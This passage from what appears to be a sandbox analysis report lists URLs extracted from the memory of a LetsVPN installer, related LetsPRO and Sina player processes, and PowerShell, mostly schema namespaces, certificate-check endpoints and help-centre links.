              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/tabcontrollerdictionary.baml
              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/tabcontrollerdictionary.bamld
              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/textboxdictionary.baml
              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/textboxdictionary.bamld
              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/windowdictionary.baml
              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/windowdictionary.bamld
              Source: letsVPN.exe, 00000000.00000002.2240005982.0000000140081000.00000002.00000001.01000000.00000003.sdmp, letsVPN.exe, 00000000.00000000.2132205568.0000000140081000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.pacific.net.sg/~jupboo
              Source: letsVPN.exe, 00000000.00000002.2240005982.0000000140081000.00000002.00000001.01000000.00000003.sdmp, letsVPN.exe, 00000000.00000000.2132205568.0000000140081000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.pacific.net.sg/~jupboohttp://www.atomixbuttons.comhttp://web.singnet.com.sg/~rendsofthtt
              Source: letsvpn-latest.exe, 00000015.00000003.2352114533.000000000310F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://icsharpcode.net/sharpdevelop/avalonedit
              Source: letsvpn-latest.exe, 00000015.00000003.2352114533.000000000310F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://icsharpcode.net/sharpdevelop/avalonedit#ICSharpCode.AvalonEdit.Highlighting
              Source: letsvpn-latest.exe, 00000015.00000003.2352114533.000000000310F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://icsharpcode.net/sharpdevelop/avalonedit#ICSharpCode.AvalonEdit.HighlightingQ
              Source: letsvpn-latest.exe, 00000015.00000003.2352114533.000000000310F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://icsharpcode.net/sharpdevelop/syntaxdefinition/2008
              Source: letsvpn-latest.exe, 00000015.00000003.2352114533.000000000310F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://icsharpcode.net/sharpdevelop/syntaxdefinition/20081Error
              Source: LetsPRO.exe, 0000003B.00000002.2711648046.0000000005742000.00000002.00000001.01000000.0000001E.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
              Source: sinaplayer_service.exe, sinaplayer_service.exe, 00000013.00000000.2209995817.000000000053D000.00000002.00000001.01000000.0000000B.sdmp, sinaplayer_service.exe, 00000013.00000002.3388043166.000000000053D000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://log.v.iask.com/n.gif?app=pcClient&type=crash&clientType=0&machineCode=
              Source: letsvpn-latest.exe, 00000015.00000003.2524906073.000000000310E000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000002.2710768941.00000000054F2000.00000002.00000001.01000000.0000001C.sdmpString found in binary or memory: http://logging.apache.org/log4net/release/faq.html#trouble-EventLog
              Source: letsvpn-latest.exe, 00000015.00000003.2690094666.000000000072D000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000002.2780682524.000000000040A000.00000004.00000001.01000000.0000000F.sdmp, letsvpn-latest.exe, 00000015.00000000.2224792878.000000000040A000.00000008.00000001.01000000.0000000F.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: powershell.exe, 0000001B.00000002.2594140593.0000000005789000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: letsvpn-latest.exe, 00000015.00000003.2343440386.000000000310D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
              Source: letsvpn-latest.exe, 00000015.00000003.2343440386.000000000310D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
              Source: letsvpn-latest.exe, 00000015.00000003.2343440386.000000000310D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0L
              Source: letsVPN.exe, 00000000.00000003.2184550370.0000000004201000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2374293880.0000000003107000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2463704916.000000000310F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2376938176.000000000310A000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2382422966.000000000310C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2478011371.000000000310A000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2432280356.0000000003101000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2369093669.000000000310B000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2558570579.0000000003107000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2458361290.0000000003100000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2406641167.0000000003106000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2541164206.000000000310C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2530969091.000000000310E000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2490411396.0000000003102000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2486208547.000000000310D000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2449881395.0000000003109000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2509600299.0000000003102000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2557572351.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 
00000015.00000003.2520982126.00000000031F6000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2400273396.000000000310F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2491542161.000000000310A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
              Source: letsVPN.exe, 00000000.00000003.2184550370.0000000004201000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2374293880.0000000003107000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2463704916.000000000310F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2376938176.000000000310A000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2382422966.000000000310C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2478011371.000000000310A000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2432280356.0000000003101000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2369093669.000000000310B000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2558570579.0000000003107000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2458361290.0000000003100000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2406641167.0000000003106000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2541164206.000000000310C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2530969091.000000000310E000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2490411396.0000000003102000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2486208547.000000000310D000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2449881395.0000000003109000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2509600299.0000000003102000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2557572351.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 
00000015.00000003.2520982126.00000000031F6000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2400273396.000000000310F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2491542161.000000000310A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
              Source: letsVPN.exe, 00000000.00000003.2184550370.0000000004201000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2374293880.0000000003107000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2463704916.000000000310F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2376938176.000000000310A000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2382422966.000000000310C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2478011371.000000000310A000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2432280356.0000000003101000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2369093669.000000000310B000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2558570579.0000000003107000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2458361290.0000000003100000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2406641167.0000000003106000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2541164206.000000000310C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2530969091.000000000310E000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2490411396.0000000003102000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2486208547.000000000310D000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2449881395.0000000003109000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2509600299.0000000003102000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2557572351.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 
00000015.00000003.2520982126.00000000031F6000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2400273396.000000000310F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2491542161.000000000310A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/gsgccr45codesignca20200V
              Source: letsVPN.exe, 00000000.00000003.2184550370.0000000004201000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2374293880.0000000003107000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2463704916.000000000310F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2376938176.000000000310A000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2382422966.000000000310C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2478011371.000000000310A000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2432280356.0000000003101000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2369093669.000000000310B000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2558570579.0000000003107000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2458361290.0000000003100000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2406641167.0000000003106000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2541164206.000000000310C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2530969091.000000000310E000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2490411396.0000000003102000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2486208547.000000000310D000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2449881395.0000000003109000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2509600299.0000000003102000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2557572351.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 
00000015.00000003.2520982126.00000000031F6000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2400273396.000000000310F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2491542161.000000000310A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr606
              Source: powershell.exe, 0000001B.00000002.2590832104.0000000004876000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: sinaplayer_service.exeString found in binary or memory: http://rcd.video.sina.com.cn/realtime_pcdesktop
              Source: sinaplayer_service.exe, sinaplayer_service.exe, 00000013.00000000.2209995817.000000000053D000.00000002.00000001.01000000.0000000B.sdmp, sinaplayer_service.exe, 00000013.00000002.3388043166.000000000053D000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://rcd.video.sina.com.cn/realtime_pcdesktop?app=pcClient&type=crash&clientType=0&machineCode=
              Source: sinaplayer_service.exe, 00000013.00000000.2209995817.000000000053D000.00000002.00000001.01000000.0000000B.sdmp, sinaplayer_service.exe, 00000013.00000002.3388043166.000000000053D000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://rcd.video.sina.com.cn/realtime_pcdesktop?app=pcClient&type=crash&clientType=0&machineCode=htt
              Source: sinaplayer_service.exe, 00000013.00000000.2209995817.000000000053D000.00000002.00000001.01000000.0000000B.sdmp, sinaplayer_service.exe, 00000013.00000002.3388043166.000000000053D000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://rcd.video.sina.com.cn/realtime_pcdesktopcrash_checkpoint.txtmax-reportsno-windowreporterdumps
              Source: letsvpn-latest.exe, 00000015.00000003.2350184994.0000000003107000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2360789274.0000000003103000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000000.2693507418.0000000000712000.00000002.00000001.01000000.00000019.sdmp, LetsPRO.exe, 0000003D.00000002.3395428987.00000000024D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.fontawesome.io/icons/
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/claims/EmailAddressNhttp://schemas.xmlsoap.org/claims/GroupJhttp://schema
              Source: powershell.exe, 0000001B.00000002.2590832104.0000000004876000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressingzhttp://docs.oasis-open.org/ws-sx/ws-secureconversat
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/mex
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/transfer/Getthttp://schemas.xmlsoap.org/ws/2004/09/transfer/Ge
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/scXhttp://schemas.xmlsoap.org/ws/2005/02/sc/sct
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/CancelT
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/IssueT
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issuelhttp://schemas.xmlsoap.org/ws/2005/02/trust/RS
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/RenewT
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/ValidateT
              Source: letsvpn-latest.exe, 00000015.00000003.2369093669.000000000310B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://in.appcenter.ms
              Source: letsvpn-latest.exe, 00000015.00000003.2369093669.000000000310B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://in.appcenter.ms./logs?api-version=1.0.0
              Source: letsvpn-latest.exe, 00000015.00000003.2558570579.0000000003107000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2557572351.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2551617958.0000000003102000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2550819271.000000000310C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2360789274.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2559553635.0000000003104000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000000.2693507418.0000000000712000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/2780068-%E5%A6%82%E4%BD%95%E4%B8%8B%E8%BD%BD%E5%BE%9
              Source: letsvpn-latest.exe, 00000015.00000003.2558570579.0000000003107000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2557572351.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2551617958.0000000003102000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2550819271.000000000310C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2559553635.0000000003104000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/2825583-killer-%E7%BD%91%E5%8D%A1%E9%9C%80%E8%A6%81%
              Source: letsvpn-latest.exe, 00000015.00000003.2540388377.000000000310F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/2830282-%D0%BE%D0%B1%D1%80%D0%B0%D1%82%D0%B8%D1%82%D
              Source: letsvpn-latest.exe, 00000015.00000003.2360789274.0000000003103000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000000.2693507418.0000000000712000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/2830420-special-settings-for-killer-networking-produ
              Source: letsvpn-latest.exe, 00000015.00000003.2558570579.0000000003107000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2557572351.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2551617958.0000000003102000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2550819271.000000000310C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2559553635.0000000003104000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/2907458-%E6%8F%90%E7%A4%BA%E7%BB%91%E5%AE%9A%E8%AE%B
              Source: letsvpn-latest.exe, 00000015.00000003.2558570579.0000000003107000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2557572351.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2551617958.0000000003102000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2550819271.000000000310C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2360789274.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2559553635.0000000003104000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000000.2693507418.0000000000712000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/2907649-%E9%80%9A%E8%BF%87%E7%94%B3%E8%BF%B0%E6%89%B
              Source: letsvpn-latest.exe, 00000015.00000003.2540388377.000000000310F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/2919829-%D0%BA%D0%B0%D0%BA-%D0%BF%D0%BE%D0%BB%D1%83%
              Source: letsvpn-latest.exe, 00000015.00000003.2540388377.000000000310F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/2922442-%D1%87%D1%82%D0%BE-%D0%B4%D0%B5%D0%BB%D0%B0%
              Source: letsvpn-latest.exe, 00000015.00000003.2540388377.000000000310F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/2923401-%D0%BA%D0%B0%D0%BA-%D0%BF%D0%BE%D0%B6%D0%B0%
              Source: letsvpn-latest.exe, 00000015.00000003.2360789274.0000000003103000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000000.2693507418.0000000000712000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/2925752-how-to-download-letsvpn
              Source: letsvpn-latest.exe, 00000015.00000003.2360789274.0000000003103000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000000.2693507418.0000000000712000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/2926044-what-if-i-reached-maximum-connection-limit
              Source: letsvpn-latest.exe, 00000015.00000003.2360789274.0000000003103000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000000.2693507418.0000000000712000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/2926062-recover-my-letsvpn-account
              Source: letsvpn-latest.exe, 00000015.00000003.2558570579.0000000003107000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2557572351.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2551617958.0000000003102000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2550819271.000000000310C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2559553635.0000000003104000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/3076586-ipv6-%E7%BD%91%E7%BB%9C%E5%8D%8F%E8%AE%AE%E9
              Source: letsvpn-latest.exe, 00000015.00000003.2360789274.0000000003103000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000000.2693507418.0000000000712000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/3081101-adjust-the-settings-for-ipv6
              Source: letsvpn-latest.exe, 00000015.00000003.2540388377.000000000310F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/3083439-%d1%87%d1%82%d0%be-%d0%b4%d0%b5%d0%bb%d0%b0%
              Source: letsvpn-latest.exe, 00000015.00000003.2540388377.000000000310F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/3083562-%D1%81%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D
              Source: letsvpn-latest.exe, 00000015.00000003.2558570579.0000000003107000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2557572351.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2551617958.0000000003102000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2550819271.000000000310C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2559553635.0000000003104000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/3130411-smartbyte-%E8%BD%AF%E4%BB%B6%E9%9C%80%E8%A6%
              Source: letsvpn-latest.exe, 00000015.00000003.2360789274.0000000003103000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000000.2693507418.0000000000712000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/3401886-special-settings-for-smartbyte
              Source: letsvpn-latest.exe, 00000015.00000003.2558570579.0000000003107000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2557572351.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2551617958.0000000003102000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2550819271.000000000310C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2559553635.0000000003104000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/3706909-%E8%B4%A6%E6%88%B7%E7%B3%BB%E7%BB%9F%E6%97%A
              Source: letsvpn-latest.exe, 00000015.00000003.2360789274.0000000003103000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000000.2693507418.0000000000712000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/3710603-about-logging-in-out-anomalies
              Source: letsvpn-latest.exe, 00000015.00000003.2540388377.000000000310F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/3710827-%D0%B7%D0%B0%D1%8F%D0%B2%D0%BB%D0%B5%D0%BD%D
              Source: letsvpn-latest.exe, 00000015.00000003.2558570579.0000000003107000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2557572351.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2551617958.0000000003102000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2550819271.000000000310C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2559553635.0000000003104000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/8259671-expressconnect-%E6%9C%8D%E5%8A%A1%E9%9C%80%E
